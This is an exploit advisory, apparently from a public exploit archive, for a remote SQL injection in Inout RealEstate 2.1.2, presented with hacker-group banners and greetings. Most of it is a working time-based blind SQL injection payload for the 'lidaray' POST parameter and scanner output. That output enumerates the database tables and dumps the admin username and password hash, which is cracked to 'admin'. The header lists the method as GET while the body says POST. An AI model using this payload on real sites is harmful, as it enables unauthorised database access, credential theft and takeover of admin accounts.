Headline
Inout RealEstate 2.1.2 SQL Injection
Inout RealEstate version 2.1.2 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr │ │ :│ Website : inoutscripts.com │ │ ││ Vendor : Inout Scripts │ │ ││ Software : Inout RealEstate 2.1.2 │ │ Inout RealEstate is an easy, flexible ││ Vuln Type: Remote SQL Injection │ │ and simple property management solution ││ Method : GET │ │ ideal for business start-ups ││ Impact : Database Access │ │ ││ │ │ ││────────────────────────────────────────────┘ └─────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7 CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘POST parameter 'lidaray' is vulnerable.---Parameter: lidaray (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb---[INFO] the back-end DBMS is MySQL[INFO] fetching current databasecurrent database: 'inout_realestate'fetching tables for database: 'inout_realestate'Database: inout_realestate[45 tables]+--------------------------------+| adcode || admin_account || admin_payment_details || agent_list_request_to_user || broker_citymap || broker_rate || broker_review || brokerabusereport || category_property || chat_details || chat_messages || checkout_ipn || countries || custom_field || detail_statistics_list || email_templates || enquiry_status || forgetpassword || inout_ipns || invoicegen || languages || list_brokermap || list_images || list_main || listopenhouse || normal_statistics_list || paymentdetailstat || ppc_currency || public_side_media_detail || public_slide_images || pupularsiarchlist || recentsearchlist || settings || sold_listing || soldlistadd || traveller_bank_deposit_history || user_broker_licenses || user_broker_registration || user_email_verification || user_list_agent_request || user_registration || user_wishlist_mapping || userabusereport || userlistactive || wish_list |+--------------------------------+[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'Database: inout_realestateTable: admin_account[6 columns]+------------+--------------+| Column | Type |+------------+--------------+| admin_type | tinyint(4) || id | int(11) || logouttime | int(11) || password | varchar(255) || status | tinyint(4) || username | varchar(200) |+------------+--------------+[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'Database: inout_realestateTable: admin_account[1 entry]+----+----------+------------------------------------------+------------+| id | username | password | admin_type |+----+----------+------------------------------------------+------------+| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0 |+----+----------+------------------------------------------+------------+[-] Done